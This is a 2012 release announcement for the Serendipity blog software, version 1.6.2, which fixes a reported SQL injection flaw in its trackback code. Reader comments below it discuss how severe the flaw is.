Serendipity 1.6.2 released

UPDATED: 2012-05-22 12:00 to clarify impact.

Good and bad things come in doubles, it seems. We are sorry to inform you that another security issue in Serendipity has been found by the High-Tech Bridge SA Security Research Lab (Advisory HTB23092). This issue has been reported today at 11:27 and we're happy to provide a quick fix for that.

You can either download the full 1.6.2 release, or apply this simple fix to the file include/functions_trackbacks.inc.php: diff on github.

The error here is that input is not properly validated and can be used (when magic_quotes_gpc is off) to inject SQL code to a SQL query; since our DB layer does not execute multiple statements, and the involved SQL query is not used to produce output code. Thanks to Pawel Golen it was made clear to us that this issue can in fact be used to remotely access the database through blind sql injection attacks (this method however is really slow and creates a lot of traffic, since only using 0/1 as a result of the exploit will mean a lot of queries to deduce the content). Thus you should definitely upgrade your installation.

Serendipity is an open-source based product with no specific funding, so we depend on nice people like High-Tech Bridge, Stefan Schurtz, Hanno Böck and all the others of the past to report issues to us. In turn we promise to fix them as quickly and transparently as possible.

Trackbacks

Trackback-URL für diesen Eintrag

Kommentare

Ansicht der Kommentare: (Linear | Verschachtelt)

Pawel Golen am um :

I can't agree with this risk rating. Blind sql injection can be used in this case to extract database content. I've checked it and it works like a charm.

Garvin am um :

Hi Pawel! Can you explain how you achieve that? The query is only executed, and no returned data is passed along to output, so I don't exactly see how this can be used. I am not a SQL security expert, so if you can explain the situation, of course I would raise the risk assassment in that case!

Thanks for your input, Garvin

Pawel Golen am um :

I've sent you an email at blog@... with details. I hope you got it.

Garvin am um :

Thanks a lot for your specific email, now I see a lot clearer and have changed this blog text accordingly.

ahappycustomer am um :

now i am happy that i run a 4 year old version of s9y that is not affected by this bug. thank you so much for s9y, i'm a very happy "customer" :)

and yes, i know that 1.3 had security issues since then, but those are all limited to weird extensions or being an admin if i don't miss anything. so thanks again, this proves so much how s9y is superior to wordpress when it comes to security.

Kommentar schreiben

Die angegebene E-Mail-Adresse wird nicht dargestellt, sondern nur für eventuelle Benachrichtigungen verwendet.

Um maschinelle und automatische Übertragung von Spamkommentaren zu verhindern, bitte die Zeichenfolge im dargestellten Bild in der Eingabemaske eintragen. Nur wenn die Zeichenfolge richtig eingegeben wurde, kann der Kommentar angenommen werden. Bitte beachten Sie, dass Ihr Browser Cookies unterstützen muss, um dieses Verfahren anzuwenden.
CAPTCHA

BBCode-Formatierung erlaubt
Markdown-Formatierung erlaubt